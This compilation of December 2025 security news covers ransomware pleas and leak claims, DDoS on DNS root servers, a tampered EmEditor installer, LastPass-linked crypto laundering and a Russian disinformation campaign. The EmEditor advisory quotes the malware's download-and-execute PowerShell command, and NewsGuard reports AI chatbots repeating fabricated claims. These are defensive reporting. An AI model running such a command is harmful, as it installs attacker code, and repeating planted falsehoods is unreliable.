bleepingcomputer.com
By Sergiu Gatlan
December 30, 2025
Two former employees of cybersecurity incident response companies Sygnia and DigitalMint have pleaded guilty to targeting U.S. companies in BlackCat (ALPHV) ransomware attacks in 2023.
33-year-old Ryan Clifford Goldberg of Watkinsville, Georgia (in federal custody since September 2023), and 28-year-old Kevin Tyler Martin of Roanoke, Texas, who were charged in November, have now pleaded guilty to conspiracy to obstruct commerce by extortion and are set to be sentenced on March 12, 2026, facing up to 20 years in prison each.
Together with a third accomplice, the two BlackCat ransomware affiliates breached the networks of multiple victims across the United States between May 2023 and November 2023, paying a 20% share of ransoms in exchange for access to BlackCat's ransomware and extortion platform.
Goldberg is a former Sygnia incident response manager, and Martin worked at DigitalMint as a ransomware threat negotiator (as did the unnamed co-conspirator).
"These defendants used their sophisticated cybersecurity training and experience to commit ransomware attacks — the very type of crime that they should have been working to stop," said Assistant Attorney General A. Tysen Duva. "Extortion via the internet victimizes innocent citizens every bit as much as taking money directly out of their pockets."
According to court documents, their alleged victims include a Maryland pharmaceutical company, a California engineering firm, a Tampa medical device manufacturer, a Virginia drone manufacturer, and a California doctor's office.
While they demanded ransoms ranging from $300,000 to $10 million, prosecutors said they were only paid $1.27 million, by the Tampa medical device company, after encrypting its servers and demanding $10 million in May 2023. While other victims also received ransom demands, the indictment does not indicate whether additional payments were made.
As BleepingComputer previously reported, the Justice Department was also investigating a former DigitalMint negotiator in July for allegedly working with ransomware groups. However, the DOJ and FBI did not comment on the investigation, and it is unclear if this case is related to it.
In December 2023, the FBI created a decryption tool after breaching BlackCat's servers to monitor their activities and obtain decryption keys. The FBI also found that the BlackCat operation collected at least $300 million in ransom payments from more than 1,000 victims until September 2023.
In a February 2024 joint advisory, the FBI, CISA, and the Department of Health and Human Services (HHS) also warned that BlackCat affiliates were primarily targeting organizations in the U.S. healthcare sector.
Hackread – Cybersecurity News, Data Breaches, AI, and More
By Waqas
December 26, 2025
On December 25, while much of the world was observing Christmas, the Everest ransomware group published a new post on its dark web leak site claiming it had breached the systems of Chrysler, an American automaker. The group says it exfiltrated 1088 GB (over 1 TB) of data, describing it as a full database linked to Chrysler operations.
According to the threat actors, the stolen data spans from 2021 through 2025 and includes more than 105 GB of Salesforce related information. Everest claims the data contains extensive personal and operational records tied to customers, dealers, and internal agents.
Screenshot from the Everest ransomware group’s dark web leak site (Credit: Hackread.com)
Leaked Screenshots and Sample Data Details
Screenshots shared by the group and reviewed for this report appear to show structured databases, internal spreadsheets, directory trees, and CRM exports. Several images display Salesforce records containing customer interaction logs with names, phone numbers, email addresses, physical addresses, vehicle details, recall case notes, and call outcomes such as voicemail, disconnected, wrong number, or callback scheduled.
Related screenshots (Credit: Hackread.com)
The same material also includes agent work logs documenting call attempts, recall coordination steps, appointment handling, and vehicle status updates, such as sold, repaired, or owner not found.
Additional screenshots appear to reference internal file servers and directories labelled with dealer networks, automotive brands, recall programs, FTP paths, and internal tooling. One set of images also suggests the presence of HR or identity-related records, listing employee names, employment status fields such as active or permanently separated, timestamps, and corporate email domains associated with Stellantis.
For your information, Stellantis is a global automaker behind brands such as Jeep, Chrysler, Dodge, and FIAT. The automaker was also a victim of a cyber attack in September 2025.
Samples published by the attackers also include recall case narratives documenting customer conversations, interpreter use, dealership coordination, appointment scheduling, and follow-up actions. These records align with standard automotive recall support and customer service processes and are consistent with the CRM data shown in other samples.
The group has threatened to publish the full dataset once its countdown timer expires, stating that the company still has time to make contact. Everest also announced plans to release audio recordings linked to customer service interactions, further escalating the pressure.
Unconfirmed Pending Chrysler Response
Ransomware groups increasingly time disclosures around holidays, when incident response capacity is often reduced. At the time of writing, Chrysler has not publicly confirmed the breach or commented on the claims, and independent verification remains limited.
If validated, the alleged exposure would raise significant concerns regarding customer privacy, internal operational security, and third-party platform governance, given the reported scale and sensitivity of the CRM and recall management data involved.
This story is developing.
NETSCOUT netscout.com
By John Kristoff, Max Resing
December 17th, 2025
Executive Summary
The internet is a system of systems. There is no central organizing committee that governs how it is constructed and operated. There are norms and best practices, as well as agreed-upon standards of operation such as what an Internet Protocol (IP) datagram looks like and how it should be interpreted, but even the behaviors of creating and interpreting IP packets can sometimes vary. For these reasons, to identify the core of the internet, and enforce lasting and comprehensive control over it, is not easy. However, there are a handful of internet subsystems people often name as being critical to the proper and safe functioning of the internet. One such subsystem is the Domain Name System (DNS) root servers. Internet disruptions can take many forms, but if the root DNS system were to become unavailable, it would be practically indiscernible from a complete and total internet outage. In practice, the system’s resiliency and caching behavior of resolvers significantly blunts the likelihood of a complete system failure. Nevertheless, the performance and accuracy of this subsystem is of utmost importance.
The root DNS system has come under attack many times throughout history, and in some cases, we have seen some partial disruption. Overall, however, the DNS root server system has remained robust and widely available. Replication and redundancy of root system component parts, along with high levels of operational care, have largely led to the success of the root server system. However, the root system is always under pressure from high-rate packet floods, route hijacking, and physical sabotage. This blog examines some of these pressures from the perspective of distributed denial-of-service (DDoS) attack traffic to which the root server system is subject.
Key Findings
Background
Most internet client communications start with a DNS query. An application maps an abstract but human-readable name into something about that name such as an IP address. This process is colloquially called the DNS resolution process, and the DNS root servers literally and figuratively stand at the apex of this hierarchical system. They are the entry point into a distributed database that makes mapping names to IP addresses possible. Technically, the internet could operate without DNS, but in practice it has become an important part of the communications process. It is safe to say that the DNS is one of the most important—if not the most important—subsystem of them all. The performance and availability of this system therefore is paramount.
DNS servers come under attack all the time, some more than others. An attack involving the DNS is typically one of two types. The first major type’s purpose is to compromise the integrity of DNS data. This might be performed by altering the source of DNS data itself—by compromising a server and changing zone files, for example. Alternatively, an attacker may try to manipulate a resolution in flight. DNS cache poison attacks are a common vector of attack against the resolution process, for instance.
The second type of attack attempts to disrupt the DNS resolution process by taking an authoritative DNS server in the name space hierarchy out of service. This is a classic denial-of-service attack. The nearer the apex of the name space or for highly impactful zones, a disruption can have far-reaching effects. If the root servers were to be disrupted, for example, this would ultimately cause problems for practically everyone and everything that uses the DNS.
Fortunately, the DNS root server system has rarely been the target of successful integrity or disruption attacks. That is not to say the DNS root system has not been attacked; this Wikipedia page lists a few high-profile attacks DNS root servers have been subject to.
The root server system is extremely well provisioned and operated. There are 12 root server operators and hundreds of root servers located all over the world. Primarily through the use of BGP anycast, the modern root server system is extraordinarily resilient to denial-of-service packet flooding attacks. However, attack attempts still seem to appear from time to time. In the remainder of this article, we examine some of the attacks the root system is subject to, and with the help of third-party data show how well the system has withstood these onslaughts.
Motivations for DDoS Attacks on DNS Root Servers
The root servers have been subject to a variety of threats, with some degree of success. Due to the extensive redundancy and capacity of the current system, however, disrupting the system with packet flooding–style attacks is not easy. Furthermore, most modern attacks aim to disrupt a specific subset of service on the internet, not the entire internet itself. Although some attackers may seek to cause general mischief or to exert a show of strength, a degraded root server system would just make everything worse for everyone. This is rarely the objective of today’s internet miscreants. In addition, internet defenders everywhere leap into action the larger and more widespread attacks become. An attack against the root system is not just an attack against the 12 root operators and their systems, but against the entire internet, much of which will respond to thwart attempts to disrupt the system.
So, although attacks on the DNS root occur, most of them are rarely noticed by the public or do not have a significant impact. Nonetheless, we do observe elevated rates of traffic toward the root—traffic that might even overwhelm many other organizations and networks. Attacks against the root may be trying to learn incident response time and defenses. They might also be observing the effect attacks have on public monitoring graphs of performance or response latency—if not for the root specifically, perhaps even local and in-transit networks. The root system, being so central to the internet, is exposed to a lot of suspicious and malicious traffic. Much of this otherwise-unwanted traffic may be simply noise, but whatever the reasons, it is often helpful to study what the root sees, because it just may be a harbinger of what any target on the internet might be up against. What can we learn from analyzing attacks on the root? We explore this question in the next section.
Analysis
NETSCOUT’s ATLAS visibility platform provides a tremendous amount of telemetry for DDoS attack events. Figure 1 presents a chronological overview of DDoS events aimed at the root servers. The strongest volumetric attack in the ATLAS dataset targeted the A root server with 21 Gb/s of traffic on August 17, 2025.
Figure 1: Chronological overview of DDoS attack events on DNS root servers as visible in ATLAS threat intelligence datasets. Illustrated are a total of 38 data points. (The dataset observes no attacks on g.root-servers.net.)
ASERT observes a different set of DDoS attack vectors to different root servers. The A root and the M root face numerous DDoS attack vectors. In contrast, D and H–L root servers are only observed to have seen the combinations of total traffic and Internet Control Message Protocol (ICMP) attacks. Often, the ICMP observations are sympathetic to a DDoS attack, meaning that attackers and/or defenders probe systems to gain insights. In theory, each instance (A through M) of the root should be a mirror of the others.
Why might some root server instances be subject to vastly different amounts of traffic? A variety of reasons could explain this discrepancy. For example, some instances may be preferred by resolvers due to historical accident, topological connectivity, or resolver selection strategy. An interesting speculation of why the A root receives more attacks is because it is the first letter of the alphabet—a dull but probable reason. Root operators deploy different numbers of anycast instances, and those instances are distributed unevenly around the world. Because BGP anycast directs queries to the topologically closest anycast instance, some root instances may naturally attract more traffic, including more noise and invalid queries (see Figure 2).
Figure 2: This percentage overview presents the DDoS attack events observed and reveals how some root servers receive a wider array of DDoS attack vectors.
Discussion
The numerous instances of root servers make it particularly cumbersome to construct a full picture of traffic that reaches the root servers. Although anycast impacts the visibility of external institutions into operational aspects of root server instances, it enhances the resiliency of a DNS root server formidably—a much-desired characteristic for such a critical building block of the internet. The distribution of traffic to different instances provides the advantage of spreading queries out but also isolating sources of DDoS attack traffic to local instances.
Studies over the years have measured significant amounts of query traffic to root servers that are illegitimate. [Wessel, ISOC]. Despite the massive overrepresentation of noise to useful query traffic, the steady state of DNS root traffic volumes remains relatively modest compared with other types of services, usually measured in the tens of megabits per second. This is due to the nature of DNS query traffic itself: small, short-lived request/response packets. Long-lived, large data flows don’t occur in the DNS. Furthermore, although the use of DNS over Transmission Control Protocol (TCP) is slightly increasing, TCP-based attacks are still relatively rare and infrequent in the DNS.
What lessons can we learn from the resiliency of the DNS root server system? Simplicity, distributed instance placement, operational diversity, the use of anycast, and of course expert technical operators overseeing it all. These attributes may not be easily replicated in other parts of the internet, but perhaps some of what works for the root can be applied to other systems where it fits.
Recommendations
Defenders can take lessons from DNS root server operations. In some cases, their techniques are engineering choices, not commercial purchasing decisions. For example, can anycast be used to help make the attack surface wider and less reliant on single points of failure? To detect and mitigate abusive, ever-changing networks of varying size and duration, we recommend the following:
Real-time visibility into volumetric traffic floods and distributed attack patterns. Tools such as NETSCOUT Arbor Sightline can help surface early signs of trouble and trigger flow-specification and remotely triggered black hole (RTBH) defenses to upstream providers.
Proactive mitigation with automated systems such as Arbor Threat Mitigation System (TMS) or Arbor Edge Defense (AED). These can stop both volumetric floods and more-complex, multivector attacks.
Intelligence-driven defense with feeds such as NETSCOUT’s ATLAS Intelligence Feed (AIF). These provide information about context, what’s trending, who’s being targeted, and how actors are evolving.
Staying ahead of threat actors is an ever-changing job and requires a broad view of where these attacks come from, how they operate, and where they could strike next.
EmEditor (Text Editor) emeditor.com
December 22, 2025 | General | By Yutaka Emura
We regret to inform you that we have identified an incident involving the EmEditor official website’s download path (the [Download Now] button), where unauthorized modification by a third party is suspected. During the affected period, the installer downloaded via that button may not have been the legitimate file provided by us (Emurasoft, Inc.).
We sincerely apologize for the concern and inconvenience this may cause. Please review the information below.
Potentially Affected Period
Dec 19, 2025 18:39 – Dec 22, 2025 12:50 (U.S. Pacific Time)
If you downloaded the installer from the [Download Now] button on the EmEditor homepage during this period, it is possible that a different file without our digital signature was downloaded. This is a conservative estimate, and in reality the affected period may have been narrower and limited to a specific timeframe.
Incident Summary (High-Level Cause)
The [Download Now] button normally points to the following URL:
https://support.emeditor.com/en/downloads/latest/installer/64
This URL uses a redirect. However, during the affected period, the redirect settings appear to have been altered by a third party, resulting in downloads being served from the following (incorrect) URL:
https://www.emeditor.com/wp-content/uploads/filebase/emeditor-core/emed64_25.4.3.msi
This file was not created by Emurasoft, Inc., and it has already been removed.
As a result, we have confirmed that the downloaded file may be digitally signed not by us, but by another organization named WALSHAM INVESTMENTS LIMITED.
Note: This issue may not be limited to the English page and may affect similar URLs for other languages as well (including Japanese).
emed64_25.4.3.msi
Legitimate file (official)
File name: emed64_25.4.3.msi
Size: 80,376,832 bytes
Digital signature: Emurasoft, Inc.
SHA-256: e5f9c1e9b586b59712cefa834b67f829ccbed183c6855040e6d42f0c0c3fcb3e
Suspicious file (possible tampering)
File name: emed64_25.4.3.msi
Size: 80,380,416 bytes
Digital signature: WALSHAM INVESTMENTS LIMITED
The following cases are not affected:
You updated via EmEditor’s Update Checker or through EmEditor’s automatic update
You downloaded directly from download.emeditor.info
Example: https://download.emeditor.info/emed64_25.4.3.msi
You downloaded a file other than emed64_25.4.3.msi
You used the portable version
You used the store app version
You installed/updated using winget
You downloaded the file but did not run/execute it
5-1. How to check the Digital Signature (Windows)
Right-click the file (emed64_25.4.3.msi) and select Properties.
Open the Digital Signatures tab.
Confirm that the signer is Emurasoft, Inc.
If it shows WALSHAM INVESTMENTS LIMITED, the file may be malicious.
If the “Digital Signatures” tab is not shown, the file may be unsigned or the signature may not be recognized. In that case, do not run the file; delete it and follow the guidance below.
5-2. How to check SHA-256 (Windows / PowerShell)
Open PowerShell and run:
Get-FileHash .\emed64_25.4.3.msi -Algorithm SHA256
Confirm the output SHA-256 matches:
Legitimate SHA-256:
e5f9c1e9b586b59712cefa834b67f829ccbed183c6855040e6d42f0c0c3fcb3e
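As an added example (not part of Emurasoft’s notice), the following PowerShell script performs the checks from 5-1 and 5-2 in one step, and also compares the file size against the legitimate value listed above; it assumes the installer sits in the current directory and relies only on the built-in Get-AuthenticodeSignature and Get-FileHash cmdlets.

```powershell
# Added example: verify a downloaded emed64_25.4.3.msi against the values
# published in the notice (signer, SHA-256, size). Assumes the file is in the
# current directory; pass -Path to check a file elsewhere.
function Test-EmEditorInstaller {
    param(
        [string]$Path = ".\emed64_25.4.3.msi"
    )

    # Reference values copied from the notice.
    $expectedSha256 = "e5f9c1e9b586b59712cefa834b67f829ccbed183c6855040e6d42f0c0c3fcb3e"
    $expectedSize   = 80376832
    $expectedSigner = "Emurasoft, Inc."
    $knownBadSigner = "WALSHAM INVESTMENTS LIMITED"

    if (-not (Test-Path -LiteralPath $Path)) {
        throw "File not found: $Path"
    }

    $file = Get-Item -LiteralPath $Path
    $sig  = Get-AuthenticodeSignature -FilePath $Path
    $hash = (Get-FileHash -LiteralPath $Path -Algorithm SHA256).Hash

    # Full subject of the signing certificate, or "(unsigned)" if there is none.
    # .NET quotes values containing commas (CN="Emurasoft, Inc."), so we test
    # for the signer name anywhere in the subject rather than for "CN=...".
    $signer = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { "(unsigned)" }

    $sizeOk   = ($file.Length -eq $expectedSize)
    $hashOk   = ($hash -ieq $expectedSha256)
    # A valid chain alone is not enough: the tampered file was validly signed
    # by a different organization, so the signer name must match as well.
    $signerOk = ($sig.Status -eq 'Valid') -and ($signer -like "*$expectedSigner*")

    $verdict = if ($sizeOk -and $hashOk -and $signerOk) {
        "OK: matches the legitimate installer"
    } elseif ($signer -like "*$knownBadSigner*") {
        "TAMPERED: signed by the known bad signer; do not run, delete the file"
    } else {
        "MISMATCH: signer, hash or size differs from the published values; do not run"
    }

    [pscustomobject]@{
        Path            = $file.FullName
        SizeBytes       = $file.Length
        SizeMatches     = $sizeOk
        Sha256          = $hash.ToLowerInvariant()
        Sha256Matches   = $hashOk
        SignatureStatus = $sig.Status
        Signer          = $signer
        SignerMatches   = $signerOk
        Verdict         = $verdict
    }
}

Test-EmEditorInstaller | Format-List
```

Any verdict other than OK means the file should not be executed; follow the recommended actions below.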
If the signature or SHA-256 does not match (Recommended actions)
If the digital signature is not Emurasoft, Inc. (e.g., it is WALSHAM INVESTMENTS LIMITED) or the SHA-256 does not match, you may have obtained a tampered file (potentially containing malware).
Immediately disconnect the affected computer from the network (wired/wireless)
Run a full malware scan on the system
Depending on the situation, consider refreshing/rebuilding the environment including the OS
Consider the possibility of credential exposure and change passwords used/stored on that device (and enable MFA where possible)
If you are using EmEditor in an organization, we also recommend contacting your internal security team (e.g., CSIRT) and preserving relevant logs where possible.
The suspicious installer has also been observed to run the following command:
powershell.exe "irm emeditorjp.com | iex"
This command downloads and executes content from emeditorjp.com.
emeditorjp.com is not a domain managed by Emurasoft, Inc.
Please also note that the installer may still proceed to install EmEditor normally and install legitimate EmEditor program files, which could make the issue difficult to notice.
We sincerely apologize again for the inconvenience and concern this may have caused, and we appreciate your understanding and continued support of EmEditor.
trmlabs.com Team | TRM Blog
TRM traced LastPass-linked Bitcoin laundering through mixers to high-risk Russian exchanges, showing how demixing exposes infrastructure reuse and limits mixer anonymity.
Key takeaways
In 2022, hackers breached LastPass, one of the world’s most widely used password managers, exposing backups of roughly 30 million customer vaults — encrypted containers holding users’ most sensitive digital credentials, including crypto private keys and seed phrases. Although the vaults were encrypted and initially unreadable without each user’s master passwords, attackers were able to download them in bulk. That created a long-tail risk for more than 25 million users globally: any vault protected by a weak master password could eventually be decrypted offline, turning a single 2022 intrusion into a multi-year window for attackers to quietly crack passwords and drain assets over time.
New waves of wallet drains have surfaced throughout 2024 and 2025, extending the breach’s impact far beyond its initial disclosure. By analyzing a recent cluster of these drains, TRM analysts were able to trace the stolen funds through mixers and ultimately to two high-risk Russian exchanges frequently used by cybercriminals as fiat off-ramps — with one of them receiving LastPass-linked funds as recently as October.
These findings offer a clear on-chain view of how the stolen assets are being moved and monetized, helping illuminate the pathways and infrastructure supporting one of the most consequential credential breaches of the last decade. Based on the totality of on-chain evidence — including repeated interaction with Russia-associated infrastructure, continuity of control across pre-and post-mix activity, and the consistent use of high-risk Russian exchanges as off-ramps — TRM assesses that the activity is consistent with involvement by Russian cybercriminal actors.
Analysis of these thefts reveals two consistent indicators that point toward possible Russian cybercrime involvement.
First, stolen funds were repeatedly laundered through infrastructure commonly associated with Russian cybercriminal ecosystems, including off-ramps historically used by Russia-based threat actors.
Second, intelligence linked to the wallets interacting with mixers both before and after the mixing and laundering process indicated operational ties to Russia, suggesting continuity of control rather than downstream reuse by unrelated actors.
While definitive attribution of the original intrusion cannot yet be confirmed, these signals, combined with TRM’s ability to demix activity at scale, highlight both the central role of Russian cybercrime infrastructure in monetizing large-scale hacks and the diminishing effectiveness of mixing as a reliable means of obfuscation.
What demixing revealed
TRM identified a consistent on-chain signature across the thefts: stolen Bitcoin keys were imported into the same wallet software, producing shared transaction traits such as SegWit usage and Replace-by-Fee. Non-Bitcoin assets were quickly converted into Bitcoin via instant swap services, after which funds were transferred into single-use addresses and deposited into Wasabi Wallet. Using this pattern, TRM estimates that more than USD 28 million in cryptocurrency was stolen, converted to Bitcoin, and laundered through Wasabi in late 2024 and early 2025.
Rather than attempting to demix individual thefts in isolation, TRM analysts analyzed the activity as a coordinated campaign, identifying clusters of Wasabi deposits and withdrawals over time. Using proprietary demixing techniques, analysts matched the hackers’ deposits to a specific withdrawal cluster whose aggregate value and timing closely aligned with the inflows, an alignment statistically unlikely to be coincidental.
Blockchain fingerprints observed prior to mixing, combined with intelligence associated with wallets after the mixing process, consistently pointed to Russia-based operational control. The continuity across pre-mix and post-mix stages strengthens confidence that the laundering activity was conducted by actors operating within, or closely tied to, the Russian cybercrime ecosystem.
Early Wasabi withdrawals occurred within days of the initial wallet drains, suggesting that the attackers themselves were responsible for the initial CoinJoin activity. Taken together, these findings demonstrate both the diminishing reliability of mixing as an obfuscation technique and the central role of demixing in revealing the structure and geography of large-scale illicit campaigns.
Russian off-ramps as a reinforcing signal
Analysis of LastPass-linked laundering activity reveals two distinct phases that both converged on Russian exchanges. In an earlier phase following the initial exploitation, stolen funds were routed through the now defunct Cryptomixer.io and off-ramped via Cryptex, a Russia-based exchange sanctioned by OFAC in 2024. In a subsequent wave identified in September 2025, TRM analysts traced approximately USD 7 million in additional stolen funds through Wasabi Wallet, with withdrawals ultimately flowing to Audi6, another Russian exchange associated with cybercriminal activity.
Applying the same demixing methodology across both periods, TRM identified consistent laundering patterns, including clustered withdrawals and peeling chains that funneled mixed Bitcoin into these exchanges. The repeated use of Russian exchanges at the off-ramp stage, combined with intelligence indicating Russia-based operational control both before and after mixing, suggests continuity in the laundering infrastructure rather than isolated or opportunistic usage. Together, these findings point to alignment with a persistent Russian cybercriminal ecosystem across multiple phases of the LastPass-related activity.
Why the Russian connection matters
The significance of likely Russian involvement extends beyond this single case. Russian high-risk exchanges and laundering services have repeatedly served as critical off-ramps for globally dispersed ransomware groups, sanctions evaders, and other cybercriminal networks. Their role in the LastPass laundering pipeline underscores how Russia-based financial infrastructure continues to function as a systemic enabler of global cybercrime, even as enforcement pressure increases elsewhere.
This case also highlights how mixers do not eliminate attribution risk when threat actors rely on consistent infrastructure and geographic ecosystems over time. Demixing allowed TRM to move beyond individual transactions and reveal the broader operational architecture, including where illicit value ultimately converges.
Frequently asked questions (FAQs)
What happened in the LastPass breach?
In 2022, a threat actor gained access to encrypted vault data stored by LastPass. As users failed to rotate passwords or improve vault security, attackers continued to crack weak master passwords years later — leading to wallet drains as recently as late 2025.
Why is Russian involvement suspected?
TRM observed two consistent signals:
Pre and post-mix wallet intelligence pointed to the same operator using Russian infrastructure.
Off-ramps included multiple Russia-based exchanges, including one previously sanctioned for facilitating ransomware laundering.
Behavioral patterns (e.g. wallet software traits, transaction formatting)
Timing and amounts
Destination addresses with known ties to illicit ecosystems
This enabled linkage across waves of theft and over time — exposing centralized laundering control.
USD 28 million demixed from 2024–early 2025 flows
USD 7 million from a September 2025 wave linked to additional Wasabi usage
Why is this still happening three years later?
Many affected LastPass users failed to change or secure master passwords, and their vaults still contained private keys. As threat actors brute-force vaults over time, slow-drip wallet draining has become a recurring pattern.
What makes this case important?
This is a clear example of how:
Mixers don't provide true anonymity when infrastructure is reused
Off-ramp infrastructure remains the best attribution signal
Illicit networks adapt, but don’t disappear — when one service is sanctioned, another emerges
newsguardrealitycheck.com
By Eva Maitland and Alice Lee
400 and Counting: A Russian Influence Operation Overtakes Official State Media in Spreading Russia-Ukraine False Claims
As Ukraine faces battlefield struggles, an ongoing corruption probe, and pressure from the U.S., the Storm-1516 Russian disinformation operation is becoming more prolific and harmful, an analysis of NewsGuard’s database of more than 400 false claims about the war shows.
NewsGuard has now debunked 400 false claims about the Russia-Ukraine war pushed by Russia, and an analysis of our database shows that in 2025, Russian influence operations surpassed official state media as the biggest source of these narratives.
One operation in particular, dubbed by Microsoft as Storm-1516, has emerged as the most prolific and rapidly expanding of the various operations, NewsGuard found. The campaign is known for generating and spreading false claims accusing Ukraine and its allies of corruption and other illegal acts, employing AI-enabled websites, deepfake videos, and inauthentic X accounts. False claims by the campaign often reach millions of views on social media.
RT and Sputnik, the Kremlin’s primary state-funded outlets aimed at a global audience, have long been at the heart of Russia’s propaganda efforts. However, NewsGuard found that in 2025, RT and Sputnik together spread just 15 false claims about the war — compared to 24 created and spread by Storm-1516 alone. NewsGuard sent emails to RT and Sputnik seeking comment on state media’s influence compared to Storm-1516 but did not receive a response.
Russia’s other major foreign influence operations include Matryoshka, a campaign known for mass-creating fake news reports appropriating the branding of credible news outlets, and the Foundation to Battle Injustice, a self-styled human rights organization that publishes “investigations” accusing Ukraine and its allies of human rights abuses. False claims by these campaigns are typically amplified by the Kremlin’s vast disinformation ecosystem, which includes the Pravda network, which encompasses 280 sites identified by NewsGuard that republish Russian propaganda in large volume in dozens of languages.
Nearly four years into the war in Ukraine, NewsGuard has debunked 44 false claims about the war emanating from Storm-1516, compared to 25 false claims from Matryoshka and six by the Foundation to Battle Injustice. These figures are derived from NewsGuard’s proprietary database of False Claims Fingerprints, a continuously updated datastream of provably false claims and their debunks.
Moreover, Storm-1516 has been steadily increasing its output since its inception in 2023. NewsGuard found that six of its false claims emerged from August 2023 to January 2024, 14 from February 2024 to January 2025, and 24 from February 2025 to mid-December 2025, making the campaign the fastest-growing source of false claims about the war monitored by NewsGuard.
Storm-1516 overtook the combination of RT and Sputnik in 2025 as purveyors of false information, according to NewsGuard’s database.
The rise of Storm-1516 as a source of false information about the war suggests that the Kremlin is increasingly relying on covert influence operations — rather than its state-owned media, which are sanctioned and banned in Europe and the U.S. — to spread false claims. Operations like Storm-1516, which are not officially state-owned media, are not typically subject to sanctions, although companies and individuals associated with them sometimes are. (More on this below.)
Moscow is set to spend $1.77 billion on state media in 2026, with $388 million reserved for RT, marking “a new all-time high,” the independent news agency the Moscow Times reported. Sputnik’s budget is unclear, and the amount spent by the Kremlin on its covert operations is also unknown.
FAKES PUSHING FAKES, THANKS TO AI
Thanks to AI tools, the influence campaigns outside of state media appear to be able to produce and propagate false claims at far greater speed and volume, and reach more viewers. Storm-1516 published five false claims about Ukraine in November 2025 alone, which spread in 11,900 articles and posts on X and Telegram, generating 43 million views.
AI appears to be a key factor enabling Storm-1516 to increase its productivity and effectiveness. When the campaign began in late 2023, it initially posted videos to YouTube of real people posing as whistleblowers denouncing corruption by Zelensky. By early 2024, it had begun using AI-generated personas in its “whistleblower” videos and planting its false claims on a network of hundreds of AI-enabled news sites. With names like BostonTimes.org, SanFranChron.com, and LondonCrier.com, the sites came complete with AI-generated logos and used AI to rewrite and automatically publish content from other news outlets.
THE HAND OF DOUGAN
Storm-1516 includes the efforts of John Mark Dougan, the former U.S. Marine and Florida deputy sheriff who fled to Russia in 2016 after his home was raided by the FBI for allegedly leaking confidential information about local officials. In 2018, Palm Beach County prosecutors charged Dougan with wiretapping and extortion, officially making him a fugitive on the run.
In conversations with NewsGuard, Dougan has consistently denied having any links to the Russian government. For example, when NewsGuard asked Dougan in October about his involvement with 139 French-language websites making false claims about President Macron, Dougan told us on Signal, “I’ve never heard of those sites. Still, I have no doubt [about] the accuracy and quality of the news they report.”
In October 2024, The Washington Post reported that Dougan was provided funding by the GRU, Russia’s military intelligence service, and directed by Valery Korovin, director of the Russian think tank Center for Geopolitical Expertise. The Post reported that the GRU paid Dougan to create and manage an AI server in Russia.
In December 2025, the European Union added Dougan to a new sanctions list, making him the first American to be sanctioned for allegedly running influence operations with the goal of “influenc[ing] elections, discredit[ing] political figures and manipulat[ing] public discourse in Western countries.” Eleven other individuals were also sanctioned for online influence operations. Asked over messaging app Signal about his role in Storm-1516 and how the campaign was able to increase its output in 2025, Dougan said in a Dec. 23, 2025, message, “Storm 1516? Never heard of them. Sorry.”
CAPITALIZING ON CORRUPTION
False claims generated or pushed by Storm-1516 often accuse Ukrainian President Volodymyr Zelensky and other Ukrainian officials of using Western aid money to make lavish purchases of properties, cars, and other luxury items. More than the other Russian operations, NewsGuard found that Storm-1516 has ramped up its operations in recent months, apparently seeking to capitalize on negative press linked to an ongoing corruption scandal in Ukraine and growing pressure from the Trump administration for Ukraine to make concessions to Russia.
When Ukraine’s National Anti-Corruption Bureau (NABU) announced in mid-November that it was investigating a $100 million embezzlement scheme in Ukraine’s energy sector, Storm-1516 jumped at the opportunity to spread false claims implicating Zelensky in the scandal. (Zelensky has not been indicted or directly implicated in accusations of corruption.)
For example, on Dec. 10, 2025, X accounts associated with Storm-1516 published a video modeled on the style of videos from NABU and the Specialized Anti-Corruption Prosecutor’s Office (SAP), even displaying the agencies’ logos at the start of the video, claiming that anti-corruption investigators had found $14 million in cash, records of $2.6 billion in offshore bank transfers, and a number of foreign passports belonging to Zelensky during a search of the office of Andriy Yermak, Zelensky’s former chief of staff.
A December 2025 Storm-1516 campaign made false claims, capitalizing on an ongoing corruption probe. (Screenshots via NewsGuard)
“NABU discovered a collection of foreign passports during a court authorized search of presidential chief of staff Andriy Yermak’s office in Kyiv,” the video stated, displaying images of apparent Israeli and Bahamian passports featuring Zelensky’s face and information.
The NABU/SAP video is a fabrication, and does not appear on any of NABU’s or SAP’s official social media channels or websites. There is no evidence that Zelensky or Yermak have passports of other countries.
Nevertheless, the claim spread in 4,300 posts on X and Telegram, gaining more than 4 million views. For example, a Dec. 11, 2025, X post of the video by @aleksbrz11, a pro-Kremlin account with a profile picture showing a fighter for the former Russian mercenary Wagner group, gained 1.8 million views and 1,800 reposts in one day.
IMPERSONATING CREDIBLE NEWS OUTLETS
In April 2025, the campaign began impersonating credible news outlets, publishing a video carrying the logo of the London-based tabloid The Sun that claimed Ukrainian first lady Olena Zelenska had bought a dress once owned by Princess Diana for $2.9 million. NewsGuard has since found that the campaign has impersonated nine credible news outlets to spread false claims, creating websites and videos imitating the Ukrainian news site the Kyiv Independent, the Saudi news site Al Arabiya, the investigative journalism outlet Bellingcat, and the French public broadcaster France Télévisions, among others.
In November 2025, Storm-1516 created the website PageSix.now, a site resembling PageSix.com, an offshoot of the gossip section of the New York Post, to plant a false story that Zelensky bought a $29 million New York townhouse belonging to former actor and comedian Bill Cosby. The claim gained 5,087 posts and 19.8 million views.
Storm-1516 created a website imitating PageSix.com, the site of the gossip section of the New York Post. (Screenshot via NewsGuard)
While often using AI tools to advance its false narratives, Storm-1516 efforts have an afterlife due to their propensity to infect top AI models, creating another way for the claims to infiltrate the global media ecosystem.
NewsGuard’s regular audits of the leading AI chatbots have repeatedly found that they are vulnerable to repeating false claims originating with Storm-1516. For example, in a March 2025 audit, NewsGuard prompted the chatbots with the false claim that Ukrainian fighters were filmed burning an effigy of Donald Trump, which was based on a staged video produced by Storm-1516.
Asked, “Did fighters of the Azov battalion burn an effigy of Trump?”, four of the chatbots repeated the claim as fact, citing articles from the Pravda network.
The office of the President of Ukraine, the Ukrainian National Security and Defense Council, and the Ukrainian Center for Countering Disinformation did not respond to NewsGuard’s requests for an interview.
Edited by Dina Contini and Eric Effron
Editor’s Note: This story was updated on Dec. 23, 2025, to add a comment from John Mark Dougan.
futurism.com
Joe Wilkins
Correspondent
A hacker found a way into the backend of AI startup Doublespeed, which offers customers access to a massive phone farm network.
Back in October, word started making the rounds of an AI startup called Doublespeed. Backed by venture capital firm Andreessen Horowitz, Doublespeed offers customers a unique service: access to a massive phone farm that could be used to operate hundreds of AI-generated social media accounts.
